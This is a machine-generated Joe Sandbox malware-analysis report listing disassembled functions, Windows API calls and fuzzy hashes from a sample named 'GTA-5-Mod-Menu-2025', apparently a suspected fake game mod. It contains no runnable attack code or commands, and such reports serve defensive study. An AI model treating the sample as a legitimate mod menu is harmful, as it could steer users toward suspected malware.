Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 7abbfe0a2e7d73767977260db92c2c1160e9dc0a80ed43d3bdf1e8931e871110
Instruction ID: 9b06db4a7c231a8a3275298ac8d59b3391f6eab5a4b472a04396ff0ca65de148
Opcode Fuzzy Hash: 7abbfe0a2e7d73767977260db92c2c1160e9dc0a80ed43d3bdf1e8931e871110
Instruction Fuzzy Hash: ACB14E32610609DFEB19CF28C486B657BE0FF45364F298658E9DACF2A1C335E981DB40

Function 00F8969B Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F896B1

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 2752bdc29d0988659cac3955c330b374f202c50eb3db8f75a97740cb53e9519b
Instruction ID: b0b52ec7a73b4e2a30d7e8dd749dc125da34171d5db2876846f667041a0a22be
Opcode Fuzzy Hash: 2752bdc29d0988659cac3955c330b374f202c50eb3db8f75a97740cb53e9519b
Instruction Fuzzy Hash: EFA17BB1E152098BDB18CF54DCD26AEBBF0FB48324F28962ED415E7250D7B49A40EF90

Function 00F9B6A8 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F969B4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00F95B4F,00000001,00000364,00000002,000000FF,?,00000000,?,00F8D615,00000000,?), ref: 00F969F5

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849
FindNextFileW.KERNEL32(00000000,?), ref: 00F9B93D
FindClose.KERNEL32(00000000), ref: 00F9B97C
FindClose.KERNEL32(00000000), ref: 00F9B9AF

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Find$CloseFile$AllocFirstHeapNext
String ID:
API String ID: 2701053895-0
Opcode ID: 1289ec920947374b0ddd780ffd36bca7710761142b7dcb5a2b05f640a2e30eda
Instruction ID: 366a6a34b16d3a536e2ffc9bb866dfa10b9f773a3fd56636e04150e07f33396e
Opcode Fuzzy Hash: 1289ec920947374b0ddd780ffd36bca7710761142b7dcb5a2b05f640a2e30eda
Instruction Fuzzy Hash: 63516876900108AFFF14AF78AD95ABEB7B9DF85324F1442ADF40897201EB349D41BB60

Function 00F9AFB0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9B004

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: ec75087425b40dc191a495c779d1169c9774d28b1d0ddd3b13de49215ca49894
Instruction ID: c48fd74857d90599632aa828b5d8ff5e148c94a2e54b7d1dc13966459f6243d4
Opcode Fuzzy Hash: ec75087425b40dc191a495c779d1169c9774d28b1d0ddd3b13de49215ca49894
Instruction Fuzzy Hash: AB21B672A00206ABFF28AB25ED41A7B77A8EF04310F104169F911D7151EB74DD44AB50

Function 00F8DDA2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 00F8DF26

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b7abda591af7959f65589960084a587e7ebfc65353aa94aca321f1fcddcceea6
Instruction ID: 42d8f520f4192eb056e8512168796a6a3756ce2eb7b8c340c95e486b2f326005
Opcode Fuzzy Hash: b7abda591af7959f65589960084a587e7ebfc65353aa94aca321f1fcddcceea6
Instruction Fuzzy Hash: F1B1F231E0060A8BCB28FE68C9956FEBBB1AF11324F140A1DE552DB6D1C775AD02FB51

Function 00F9B0D0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F9B124

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 734768102a3f9781879de76c6644e7aa7d7277ebad6fba2b045980f462dde31d
Instruction ID: 0cf5d1afc68d895424462182ba46973f5456a377d26d8601e79264e3533231b4
Opcode Fuzzy Hash: 734768102a3f9781879de76c6644e7aa7d7277ebad6fba2b045980f462dde31d
Instruction Fuzzy Hash: 0F112C32910106ABFF14AF28DD56ABA77ECEF05320B10417AF505D7240EB78ED44AB50

Function 00F9AC48 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

EnumSystemLocalesW.KERNEL32(00F9ACF0,00000001,00000000,?,-00000050,?,00F9AAD3,00000000,-00000002,00000000,?,00000055,?), ref: 00F9ACBA

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b557eb42550d7ab3c01ad46488d90a557064a8339212977929afc7a561697544
Instruction ID: 8dc0051a62ec4464c003654b4812bd2008d1886e212872ad7f07430770d8698f
Opcode Fuzzy Hash: b557eb42550d7ab3c01ad46488d90a557064a8339212977929afc7a561697544
Instruction Fuzzy Hash: 2B11E9366007055FEF189F39C89157AB791FF80768B15442CE9468B640D375F942E780

Function 00F9B27D Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F9AF0C,00000000,00000000,?), ref: 00F9B2A9

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0c957bdc18a8b4bd2f636d96e674870dfa72a4e5ce89d6282dbf4e63948f40f3
Instruction ID: a04a759511de777957ebe927933981c800988aa92a942e4d1aec432d5c1cb723
Opcode Fuzzy Hash: 0c957bdc18a8b4bd2f636d96e674870dfa72a4e5ce89d6282dbf4e63948f40f3
Instruction Fuzzy Hash: 61014933A10112BBFF2A5B219D0ABBE3758EB40328F14442DEC16E3180EB34FE01E694

Function 00F9AF43 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

EnumSystemLocalesW.KERNEL32(00F9AFB0,00000001,?,?,-00000050,?,00F9AA9B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00F9AF8D

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a90294515a06c033e0ebda50010d9cf09eb0bd86ef362a1b6c2244b12a5b5c22
Instruction ID: ffb77283144ee330dc38747e7fb9cf2a3c0e2125fc8c87c009a70e20cf10da30
Opcode Fuzzy Hash: a90294515a06c033e0ebda50010d9cf09eb0bd86ef362a1b6c2244b12a5b5c22
Instruction Fuzzy Hash: 58F0F6762003045FEF25AF39DC81A7A7B91EF8176CB15896CFA468B690C6759C02E790

Function 00F968BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F91CD1: EnterCriticalSection.KERNEL32(?,?,00F95D98,?,00FAFC38,00000008,00F95C8A,00000000,00000000,?), ref: 00F91CE0

EnumSystemLocalesW.KERNEL32(00F968B0,00000001,00FAFCB8,0000000C,00F962B1,-00000050), ref: 00F968F5

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 936e1c66e598b19b563db1a5e7bbfb2b2ee375f36ea10552849a34e90115826e
Instruction ID: c569b61bdbd961e225adc70f80c060cdb0d27b60bdf43c6d4168241f7323d3ce
Opcode Fuzzy Hash: 936e1c66e598b19b563db1a5e7bbfb2b2ee375f36ea10552849a34e90115826e
Instruction Fuzzy Hash: 2AF03C76A00218DFEB00EFA9E842B9D77B0FB48721F10412AF411DB2D1CB799904EF85

Function 00F9B085 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

EnumSystemLocalesW.KERNEL32(00F9B0D0,00000001,?,?,?,00F9AAF5,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00F9B0BC

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 655e4ab8902906345a9f6d54cf3d92e6a7c5726b0be5f2c82256592c1c5bce52
Instruction ID: c8006a71cb09df29dd8ff3ccb90ee651e59f0c5853eb3a55ad4935eb9c4d0283
Opcode Fuzzy Hash: 655e4ab8902906345a9f6d54cf3d92e6a7c5726b0be5f2c82256592c1c5bce52
Instruction Fuzzy Hash: 68F0E53670020997EF14AF35E96566BBF94EFC1B20B0A4458EA198B2A0C776D846E790

Function 00F963B5 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00F90A23,?,20001004,00000000,00000002,?,?,00F8F931), ref: 00F963E9

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: eddc1577f4daab2cc5bb391f3a6a44248e727090f2122c4e4ef3f7981a69624e
Instruction ID: d67e52deeff9007716740d58df61b84ad9f52701791e834a2e436be209dffad7
Opcode Fuzzy Hash: eddc1577f4daab2cc5bb391f3a6a44248e727090f2122c4e4ef3f7981a69624e
Instruction Fuzzy Hash: 60E04F7290012CBBDF122F60EC04EAE7F26EF44761F054011FC05A6221CB769920BAD1

Function 00F89A27 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009B50), ref: 00F89A2C

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0f851d35f9a6342a173ca0b3cdb99c9219182d737f647761b33f5917b6901236
Instruction ID: fb68d458ecf7e24256d3357d1c5e12897a2eda930c9587f406bf057c23a38ec4
Opcode Fuzzy Hash: 0f851d35f9a6342a173ca0b3cdb99c9219182d737f647761b33f5917b6901236
Instruction Fuzzy Hash:

Function 00F96FE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F96FE0

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 63bfd1de56f1d3c2962337067e8eec560b72feb586b0d05c0abbc05b916ed25c
Instruction ID: c7144aac35f024a716ff11f866716642f70c03e2bd6948cb9d18bfee21ce806d
Opcode Fuzzy Hash: 63bfd1de56f1d3c2962337067e8eec560b72feb586b0d05c0abbc05b916ed25c
Instruction Fuzzy Hash: 57A00474501115CF77404F35DD55F1D37D5F5455D17454155D415C5170D7744450FF01

Function 00F81BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e38f65e453b4b9fc46d9b0cb871e78bcbb7573e52fc563137549bf3b5e3af46
Instruction ID: 4bd34aaed5f06d692ceaf7149cdff96dd67e9911265ec5b0996e4e0ceb41f662
Opcode Fuzzy Hash: 7e38f65e453b4b9fc46d9b0cb871e78bcbb7573e52fc563137549bf3b5e3af46
Instruction Fuzzy Hash: F4D0923A641A58EFC210CF49E440D41F7B8FB8E770B154166EA4893B20C331FC11CAE0

Function 00FA4192 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00B70530,00B70530,00000000,7FFFFFFF,?,00FA417D,00B70530,00B70530,00000000,00B70530,?,?,?,?,00B70530,00000000), ref: 00FA4238
__alloca_probe_16.LIBCMT ref: 00FA42F3
__alloca_probe_16.LIBCMT ref: 00FA4382
__freea.LIBCMT ref: 00FA43CD
__freea.LIBCMT ref: 00FA43D3
__freea.LIBCMT ref: 00FA4409
__freea.LIBCMT ref: 00FA440F
__freea.LIBCMT ref: 00FA441F

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
Instruction ID: 7d5ed09f621ddf01f2c461627fdd4c1691ca26db63c999399dfc9e8222e6835d
Opcode Fuzzy Hash: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
Instruction Fuzzy Hash: 3B7184B2D042099BDF21AE948C81BAE77F59F8B720F280059FD04A7281D7F5AC41B760

Function 00F98576 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F985FC

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction ID: 6f67d6a2429b463f6e75f03fba0b3a9068bfac505b5086a5cc38bdd6ebe5b726
Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
Instruction Fuzzy Hash: 5AB17972D003959FFF118F64CC81BAE7BA5EF563A0F284155E904AF282DA78DC02D7A1

Function 00F8AB70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F8ABA7
___except_validate_context_record.LIBVCRUNTIME ref: 00F8ABAF
_ValidateLocalCookies.LIBCMT ref: 00F8AC38
__IsNonwritableInCurrentImage.LIBCMT ref: 00F8AC63
_ValidateLocalCookies.LIBCMT ref: 00F8ACB8

Strings

csm, xrefs: 00F8AC4D

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
